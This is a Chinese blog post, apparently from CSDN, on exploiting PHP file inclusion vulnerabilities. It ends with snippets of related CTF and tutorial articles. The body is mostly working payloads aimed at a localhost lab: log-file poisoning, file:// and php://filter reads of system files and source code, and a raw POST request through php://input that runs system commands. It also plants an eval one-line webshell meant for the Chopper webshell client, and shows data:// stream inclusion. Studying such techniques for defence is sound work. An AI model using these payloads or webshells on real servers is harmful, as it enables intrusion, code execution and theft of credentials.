文件包含&PHP伪协议

最新推荐文章于 2024-05-15 18:21:54 发布
最新推荐文章于 2024-05-15 18:21:54 发布
阅读量199 收藏
点赞数
分类专栏: 网络安全 随笔 文章标签: php 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010930278/article/details/110097933
版权
本文详细介绍了文件包含漏洞的常见利用方式,包括通过URL传参、PHP伪协议、php://filter以及POST请求来执行恶意代码。示例中提到了读取系统文件、执行系统命令等危险操作。同时,还提及了在菜刀工具中的利用技巧以及如何通过数据流文件包含进行攻击。了解这些利用手段有助于加强系统的安全防护。
摘要由CSDN通过智能技术生成

文件包含漏洞的常见利用

思路:URL传一句话进去(bp抓包),文件包含日志文件执行

http://127.0.0.1/include.php?file=../Apache/logs/access.log&666=phpinfo();

//要使用php里面的功能就必须传一个参数进去

PHP伪协议

http://127.0.0.1/include.php?file=file://c:/Windows/win.ini

路径必须是绝对路径

php://filter读写文件(查账号密码)
http://127.0.0.1/include.php?file=php://filter/read/convert.base64-encode/resource=include.php

post请求报文

POST /include.php?file=php://input&666=system('dir'); HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

<?php @eval($_REQUEST[666])?>

菜刀里面(index.php会影响菜刀连接)

http://127.0.0.1/include.php?file=php://input
666
<O><?php @eval($_POST[666]);?></O>

在菜刀里POST值使用大O标签

数据流文件包含

GET /include.php?file=data:text/plain:base64,base64编码后的值

读取压缩包内文件,php>5.3

phar://
LztCode
关注
专栏目录
PHP伪协议详解&&[SWPUCTF 2021 新生赛]include[文件包含php伪协议php]
2301_79794812的博客
11-10 140
php伪协议PHP自带的一种特殊的协议机制,可以用php伪协议不依赖于平时的文件系统或者网络协议的情况下,执行一些读写等等操作。php伪协议php://开头,后面跟着一些特定的指示或者参数,在URL中使用特殊的协议前缀来指示特定的代码或文件路径。
第十天文件包含漏洞 php伪协议
代码审计
03-15 4368
文件包含漏洞PHP中常见包含文件函数常见文件包含漏洞代码文件包含漏洞的危害文件包含的漏洞的分类本地文件包含**1.上传图片马**2.读取网站源码以及配置文件远程文件包含 什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件。而无需再次编写,这种 文件调用的过程一般被称为文件包含。 例如:include “conn.phpPHP中常见包含文件函数  include() 当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含
文件包含漏洞与php伪协议
qq_46485934的博客
09-26 845
一.前情提要 本人在写buuctf的时候,碰到一道文件包含php伪协议的题目include 于是,我就想深入的了解一下PHP伪协议 二.文件包含函数 首先归纳下常见的文件包含函数:include,require,include_once,require_once,highlight_file,show_source,readfile,file_get_contents,fopen,file 三.伪协议 php伪协议php封装协议,这些协议常被CTF出题中与文件包含漏洞结合。这里做个小结,涉及的相关伪协议
php文件包含 伪协议
m0_64361111的博客
02-28 1127
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
文件包含中的伪协议
最新发布
My笔记的博客
05-15 1209
php.ini 中的两个重要选项 PHP 中几个比较重要的伪协议php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
文件包含&php伪协议
Xiiaogu的博客
12-14 736
将文件进行base64编码再读出,即在file=后,flag前加上php://filter/read=convert.base64-encode/resource=file=php://input,下方输入<?没有flag,再输入<?添加完数据后打开终端,查找目录下文件,输入ls,没有flag。返回查找根目录,输入ls /,里边有flag文件。
文件包含时涉及PHP伪协议总结
qq_43256965的博客
05-14 1425
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
php伪协议 文件包含,文件包含漏洞(伪协议利用)
weixin_33166692的博客
03-30 1075
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
php伪协议漏洞_include(文件包含漏洞,php伪协议)
weixin_39935257的博客
01-17 1128
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php使用 "php://filter...
WEB入门——文件包含漏洞与PHP伪协议
HasntStartIsOver的博客
06-04 980
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。
php伪协议 文件包含(一)
weixin_51692662的博客
10-14 618
文件包含php伪协议
文件包含PHP伪协议学习笔记
2302_80935968的博客
03-22 1145
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 7017
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
文件包含伪协议
qq_60905276的博客
10-11 544
如果url出现有?file=XXX.php等是典型的文件包含 如下 文件包含可以使用PHP伪协议php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 php://fileter 可以读取目标文件的内容,由于读取时,一些代码不能显示,通常使用Base64加密后读取再解密。 文件包含知识点 一、原理: 在开发过程中,当频繁需要跳转网页,或者需要某个函数...
文件包含漏洞 PHP伪协议
小石头的博客
10-21 392
伪协议 include $name . '.inc' include $name require $name allow_url_include fopen($name) file_get_contents($name) file_exists($name) allow_url_fopen php 很多伪协议 所有的伪协议,在使用时,前面都不能有内容。 ...
PHP伪协议文件包含漏洞
z1moq的博客
08-26 354
文件包含漏洞 为了更好的使用代码的复用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码。但这就产生了文件包含漏洞,产生原因实在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时如果用户对变量可控,二服务器端卫队变量进行合理的校验或者校验被绕过,就会导致文件包含漏洞 文件包含所用的函数 函数 功能 include() 代码执行到 include() 函数时将执行文件中的 PHP代码 include_once() 当重
PHP伪协议-文件包含
shiyingai
12-24 2049
lfi.php <?php include $_GET['file']; ?> php://input   php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。 注:当enctype="multipart/form-data",php://input 是无效的。
文件包含支持的伪协议
qq_50673174的博客
05-15 8631
文件包含漏洞的补充。 主要是文件包含漏洞支持的伪协议
这里我们学习一下文件包含php伪协议
qq_51802152的博客
12-24 184
文件包含的含义
文件包含-伪协议filter
08-22
通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值